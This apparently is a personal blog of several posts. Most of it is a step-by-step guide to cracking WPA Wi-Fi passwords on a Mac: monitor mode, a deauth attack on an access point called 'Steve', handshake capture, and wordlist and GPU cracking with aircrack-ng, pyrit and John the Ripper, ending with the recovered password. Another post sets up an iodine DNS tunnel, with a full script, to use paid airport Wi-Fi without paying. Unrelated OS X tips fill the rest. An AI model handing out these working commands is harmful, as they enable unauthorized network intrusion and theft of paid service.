Cracking WiFis, the Apple way; part 3: OpenCL (or CUDA) and pyrit

(part1)
(part2)

Cracking the WPA password with aircrack is not fast, especially in a VM. So the first thing is to do the cracking outside of BackTrack. We have to get the .cap file out of the VM. Just drag it from the VM to the desktop.

Also using just the CPU is slow. GPUs these days can crack faster than the CPU.

X Code Command Line tools only

OS X Mountain Lion comes with OpenCL tools. X Code is big and most of it is iOS and OS X dev tools which we don't need. So only Command Line Tools can be installed. You have to have an Apple developer account to download it (it's free):

Screen Shot 2013-02-25 at 4.03.50 PM

Then:

Screen Shot 2013-02-25 at 4.03.29 PM

Click Next or Continue or whatever until it is done.

or X Code (full version)

Full X Code can be installed from the App Store:

Screen Shot 2013-02-24 at 10.43.40 PM

Then Command Line Tools have to be installed. Go to XCode, then Properties:

Screen Shot 2013-02-25 at 4.13.55 PM

Install Pyrit (AMD Radeon)

Pyrit is a python tool that cracks WPA passwords.

Prerequisites. Download these in a folder named PYRIT for example:

http://libdnet.googlecode.com/files/libdnet-1.12.tgz
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz

Then in the folder in terminal do:

tar -xzf  libdnet-1.12.tgz
cd libdnet-1.12
./configure
make
sudo make install
cd python
sudo python setup.py install
cd ../..
 
tar -xzf pylibpcap-0.6.4.tar.gz
cd pylibpcap-0.6.4
sudo python setup.py install
cd ..
 
tar -xzf scapy-latest.tar.gz
cd scapy-2.1.0
sudo python setup.py install
cd ..

Now, it's time for the pyrit tool:

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
 
cd pyrit-read-only
cd pyrit
sudo python setup.py install

Install Pyrit (NVidia)

Extra steps for NVidia:

Download nvidia driver from http://developer.nvidia.com/cuda/cuda-downloads.

If you don't have nvidia driver, you'll get: SystemError: Nvidia's CUDA-compiler 'nvcc' can't be found.

Check the first and second option:

Then:

cd ..
cd .. 
cd pyrit-read-only
cd cpyrit_cuda
sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install

Test Pyrit

On a macbook with ATI we get something like:

$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
The following cores seem available...
#1: 'OpenCL-Device 'ATI Radeon HD 6750M''
#2: 'CPU-Core (SSE2/AES)'
#3: 'CPU-Core (SSE2/AES)'
#4: 'CPU-Core (SSE2/AES)'
#5: 'CPU-Core (SSE2/AES)'
#6: 'CPU-Core (SSE2/AES)'
#7: 'CPU-Core (SSE2/AES)'
#8: 'CPU-Core (SSE2/AES)'

On a macbook with nVidia, we get something like:

$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
The following cores seem available...
#1: 'CUDA-Device #1 'GeForce 9400M''
#2: 'CPU-Core (SSE2)'

Note: I have no idea why when OpenCL or CUDA is installed it takes the place of one of the cores, on a quad-core we get 7 cores with OpenCL. When benchmarking it seems all cores are being utilized. I guess it's a bug.

Benchmarking

$ pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (7724.0 PMKs/s)... -
 
Computed 7723.98 PMKs/s total.
#1: 'OpenCL-Device 'ATI Radeon HD 6750M'': 7180.7 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2/AES)': 252.6 PMKs/s (RTT 3.8)
#3: 'CPU-Core (SSE2/AES)': 247.2 PMKs/s (RTT 3.9)
#4: 'CPU-Core (SSE2/AES)': 243.6 PMKs/s (RTT 4.0)
#5: 'CPU-Core (SSE2/AES)': 246.6 PMKs/s (RTT 3.9)
#6: 'CPU-Core (SSE2/AES)': 250.8 PMKs/s (RTT 3.8)
#7: 'CPU-Core (SSE2/AES)': 253.0 PMKs/s (RTT 3.8)
#8: 'CPU-Core (SSE2/AES)': 250.4 PMKs/s (RTT 3.9)

You can see that the GPU is faster than 7 cores (they should be 8, i don't know why one is missing)

Wordlists

Wordlists can be found here: http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html

gfxCardStatus

Make sure you're in Discrete Only mode.

Screen Shot 2013-02-25 at 12.38.06 AM

Otherwise pyrit will complain:

Exception in thread OpenCL-Device 'ATI Radeon HD 6750M':
[...]
SystemError: Failed to create command-queue (CL_INVALID_VALUE)
[...]
SystemError: The core 'OpenCL-Device 'ATI Radeon HD 6750M'' has died unexpectedly

Cracking with Pyrit

$ pyrit -r ~/Steve-01.cap --all-handshakes -i ~/WORDLISTS/4.9gb/BIG-WPA-LIST-1.txt attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
Parsing file '/Users/c00l/Desktop/Steve-01.cap' (1/1)...
Parsed 3539 packets (3539 802.11-packets), got 115 AP(s)
 
Picked AccessPoint 00:0f:01:37:1a:a0 ('Steve') automatically.
Attacking 20 handshake(s).
Tried 140007 PMKs so far; 7550 PMKs per second.
 
The password is 'forzajuve'.

--all-handshakes means that all handshakes in the file will be used together.

It will utilize the CPU and the GPU simultaneously. And now we get around 10k attempts/sec which is a lot better than aircrack-ng in a vm.

Note: your computer will unresponsive, make sure anything CPU or GPU intensive is switched off.

Some stuff was taken from here.

Check the wifis category for more tutorials.

Cracking WiFis, the Apple way; part 2: deauth attack; cracking WPA with aircrack-ng

(Go to part1)

Let's check the wi-fis:

# airodump-ng mon0

The Deauth attack

Now we choose which AP to attack. Let's choose Steve. The --bssid parameter says which AP to listen for, -c says on which channel should we stay and -w says the file we use to dump the authentication.

# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve.cap

Screen Shot 2013-02-24 at 9.35.15 PM

This attack is called the Deauth attack because we de-authenticate one client and wait for it to reconnect. -a is the AP, -c - the client we deauth, -0 is the attack, 1 means to perform it once only.

# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5

Screen Shot 2013-02-24 at 9.38.43 PM

And we get the handshake.

Now we crack it. We will use a wordlist.

# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt

 

if the password is in the wordlist, then

Unfortunately this method can try only ~800 passwords per second from the wordlist. In later articles we'll see better approaches.

 

Cracking WiFis, the Apple way; part 1: external card, backtrack, aircrack-ng, the VM

OS X natively is no good

First, trying to crack wi-fi APs on OS X natively will not work great. KisMAC is not great, it cannot inject packets with the macbook's default wi-fi card. aircrack-ng does not work.

The usb wi-fi card

So to inject stuff, an external USB wi-fi is required. I have tried ALFA AWUS036NEH (chipset Ralink RT3070) and TP-Link TL-WN722N (chipset Atheros AR9271).

ALFA's are recommended by half the internet, but I think they suck. My Alfa is not stable, it doesn't work with BT5R3, only BT5R2. The Atheros is a lot better, but no 5Ghz. I'm waiting for NETGEAR WNDA3200 which has 5Ghz radio that works simultaneously with the 2.4Ghz radio.

The VM

The best VM to use is BackTrack - all the cracking tools are inside. Latest version is BT5R3. It even comes as a prebuilt VMware virtual machine. I'm using VMware Fusion on OS X.

(user: root, pass: toor; startx to launch gnome):

Adding the card to the USB:

Screen Shot 2013-02-24 at 8.08.52 PM

Then in terminal we check for a wi-fi card. We find one on wlan1 and start a monitoring interface for it.

# airmon-ng
# airmon-ng start wlan1
# airmon-ng

Then, let's check the wi-fis:

# airodump-ng mon0

In later articles we'll see how to hack the wi-fi.

order of magnitude

root# ./john --test -format=wpapsk-opencl
OpenCL platform 0: Apple, 2 device(s).
Using device 1: <strong>ATI Radeon HD 6750M</strong>
Benchmarking: WPA-PSK PBKDF2-HMAC-SHA-1 [OpenCL]... DONE
Raw: 12126 c/s real, 87771 c/s virtual
 
root# ./john --test -format=wpapsk-opencl --device=0
OpenCL platform 0: Apple, 2 device(s).
Using device 0: <strong>Intel(R) Core(TM) i7-2820QM CPU @ 2.30GHz</strong>
Benchmarking: WPA-PSK PBKDF2-HMAC-SHA-1 [OpenCL]... DONE
Raw: 1192 c/s real, 156 c/s virtual

Reset the "Open with" database on OS X

Sometimes there are a lot of VMware Fusion items left over in the "Open with" dialog.

Here's how to rebuild the "Open with" database:

dude$ /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -kill -r -domain local -domain system -domain user
dude$ killall Finder

Make a bootable USB from ISO on OS X Mountain Lion 10.8 without any extra apps

Plugin the USB, then:

Screen Shot 2013-02-17 at 3.28.33 PM

 

 

Then

mf$ hdiutil convert -format UDRW -o BT5R2-GNOME-64.img BT5R2-GNOME-64.iso
mf$ diskutil list /dev/disk2 #(careful here)
mf$ dd if=./BT5R2-GNOME-64.img.dmg of=/dev/rdisk2 bs=1m

 

Note: that bs=1m (without it the speed is going to be less than 1mb/sec, with it it's 10mb/sec)

Note2: we're using rdisk2 instead of disk2, again this way it's faster.

Iodined - how to use free internet on airports

How to get internet connectivity on an open wi-fi access point that requires a credit card without actually paying:

Prerequisites

  • OpenWRT router
    • public ip, not necessarily static
  • account on dns.he.net
  • OS X laptop

Iodine on OpenWRT and installation on a OS X

On the OpenWRT:

  • opkg install iodined
  • update /etc/init.d/iodined to:

[dropdown_box expand_text="code" show_more="Show" show_less="Hide" start="hide"]

#!/bin/sh /etc/rc.common
# Copyright (C) 2006-2011 OpenWrt.org

START=50

start_instance () {
local section="$1"
config_get address  "$section" 'address'
config_get password "$section" 'password'
config_get tunnelip "$section" 'tunnelip'
config_get tld      "$section" 'tld'

service_start /usr/sbin/iodined -l "$address" -c -s -P "$password" $tunnelip "$tld" &
sleep 1
ifconfig dns0 $tunnelip netmask 255.255.255.0
}

start() {
config_load 'iodined'
config_foreach start_instance 'iodined'
}

stop() {
service_stop /usr/sbin/iodined
}

[/dropdown_box]

  • so that it starts automatically
/etc/init.d/iodined enable
  • edit /etc/config/iodined (because there' s a bug on openwrt)
    • change address to 192.168.14.1
config iodined
 option address ''
 option password ''
 option tunnelip '192.168.14.1'
 option tld ''
  • Make sure the openwrt router has a static ip address (he.net provides dyndns updates)
  • Make a dns zone: a.server.com ns -> openwrt.server.com
    • openwrt.server.com has a dyndns update
  • port forward 53 (tcp and udp) from first router to second router (or just open 53 on the openwrt)

osx client

  • http://tuntaposx.sourceforge.net/ (tuntap)
  • script:

[dropdown_box expand_text="code" show_more="Show" show_less="Hide" start="hide"]

#!/bin/bash

# are we root?
if ! [ $UID == 0 ] ; then
  echo "IODINE SETUP: use 'sudo $0'";
  exit 0;
fi;

#$1 says whether we use clearcode or stoynov.com
if [ -z $1 ] ; then
  echo 'IODINE SETUP: first param must be 1(i.clearcode.org) or 2(i.stoynov.com)';
  exit 0;
fi;

if [ $1 == 1 ] ; then
  endpoint_domain='i.clearcode.org'
  endpoint_net='192.168.14.0/24'
  endpoint_gw='192.168.14.1'
fi;

if [ $1 == 2 ] ; then
  endpoint_domain='j.stoynov.com'
  endpoint_net='192.168.15.0/24'
  endpoint_gw='192.168.15.1'
fi;

# get the first dns from resolv.conf and use it.
abused_nameserver=`cat /etc/resolv.conf | grep nameserver | head -1 | awk '{print $2}'`
abused_nameserver=8.8.4.4
echo ">>>>>>>>>>>>>>>>>>>USING DNS: $abused_nameserver"

# kill iodine if any and remove old routes
killall iodine
route delete 8.8.8.8 > /dev/null
route delete 8.8.4.4 > /dev/null

# get the default gateway for iodine
default_gateway=`netstat -rn | grep default | awk '{print $2}'`

#when I die, restore the default gateway, use trap to get Ctrl+C
function disconnect() {
  # kill the process with id coming as a parameter
  kill -9 $1;
  route add default $default_gateway;
}
#disconnect and exit
function cleanup() {
  disconnect $(pgrep iodine);
  exit 0;
}
trap "cleanup" SIGINT

#dns query types
dns_query_types="TXT CNAME NULL"

function connect() {
  # start iodine (possible dns types are CNAME, TXT, NULL), -F puts a pid file with the processId inside
  iodine_output=$(./iodine -T CNAME -r -P "peshev sucks" -F /var/run/iodine.pid $abused_nameserver $endpoint_domain 2>&1 | tee /dev/tty)

  #remote_net from iodine_output
  remote_net=$(echo $iodine_output | grep -o "Adding route [0-9\.]*/[0-9]\{1,2\} to [0-9\.]*" | awk '{print $3}')  

  #remote_net is something like 192.168.15.2/27 and should be 192.168.15.0/27
  remote_net=$(./ipcalc -nb $remote_net | grep Network | awk '{ print $2}')

  #tunX_ip (tunX_ip) from iodine_output
  tunX_ip=$(echo $iodine_output | grep -o "Adding route [0-9\.]*/[0-9]\{1,2\} to [0-9\.]*" | awk '{print $5}')

  #remote_gateway (gateway on iodine) from iodine_output
  remote_gateway=$(echo $iodine_output | grep -o "Server tunnel IP is [0-9\.]*" | awk '{print $5}')

  # route to nameserver to be abused
  route add -host $abused_nameserver $default_gateway
  # route to remote network via tunX_ip (necessary because my mac sucks)
  route add -net $remote_net $tunX_ip
  # change default gateway from system default to iodine 
  route delete default
  route add default $remote_gateway

  # time to download 100kb file in seconds (1.34). We remove the dot for easy comparison (1.34 -> 134)
  echo TESTING SPEED;
  t=$( { time -p curl -s ftp://speedtest:speedtest@ftp.otenet.gr/test100k.db; } 2>&1 )
  seconds=$(echo $t | awk '{ print $2;}' | tr -d . );
  echo SECONDS: $seconds;
}  
connect;

echo 'READY...READY...READY...READY...READY...'

while true; do sleep 10000; done;

[/dropdown_box]

  •  add ipcalc because the script needs it: ipcalc

Conclusion

Some testing found out speeds like 7-15 kb/s, sometimes less on 8.8.8.8 and 8.8.4.4. With local DNS servers the speeds are like 100kb/s. More testing is necessary.

Force Integrated graphics on VMware Fusion (and probably other apps) on OS X 10.8 Mountain lion (avoid discrete graphics)

With OS X 10.8 gfxCardStatus is no longer capable of enforcing Integrated Graphics card only.

When one uses VMWare Fusion, the discrete graphics card is enforced, which drains the battery too fast.

I have not found any solution online to fix this. But I managed (thanks to PePe) to discover one.

How to use Integrated Graphics Card with VMware Fusion on OS X 10.8:

  • Install gfxCardStatus
  • Before launching VMware Fusion, click on Integrated only (click it several times until it has the checkbox on the Integrated only):

Screen Shot 2013-02-15 at 2.05.32 PM

  • Then launch VMWare Fusion, start whatever virtual machine. And don't do anything inside. Leave it idle.
  • There's a BackTrack 5 R3 with the integrated graphics card:

Screen Shot 2013-02-15 at 2.08.15 PM

  • There's a BackTrack 5 R3 VM and a Windows XP (both idle) with the integrated graphics card:

Screen Shot 2013-02-15 at 2.12.34 PM

  • I'm using iStatMenus to check my power consumption. Here's my power consumption with the two VMs:

Screen Shot 2013-02-15 at 2.07.10 PM

  • Cody Krieger (the creator of gfxGraphicsStatus) says that even if it says that the Integrated is being used, the Discrete (NVidia) is still being powered on, which invalidates the whole exercise.
  • How do I know that I'm saving power? Well, let's go to Discrete and check the power consumption:

Screen Shot 2013-02-15 at 2.16.56 PM -> discrete

  • Now, let's check what the consumption is (the same two idle VMs):

 Screen Shot 2013-02-15 at 2.20.26 PM

 

  • So instead of having 3:27 hours left, I now have 1:22 hours left. My consumption 2.5 Amp, instead of 1.1 Amp.
  • I can't directly go back though:

Screen Shot 2013-02-15 at 2.27.07 PM

  • What I have to do is to stop VMware completely (Cmd + Q), go to Integrated only again and restart all the VMs
  • This is something that I discovered today. So it may not be working as expected, but for now it seems it is.
  • My setup:
    • OS X 10.8.2 on a Macbook Pro 8.2 (A1286, Quad Core i7 2.3 Ghz, 16gb RAM, 256gb OCZ Vertex 3, AMD Radeon HD 6750M 1GB)
    •  VMware Fusion 5.0.1 with 2 VMs - Windows XP Pro and Backtrack 5 R3 (both were idle during this setup).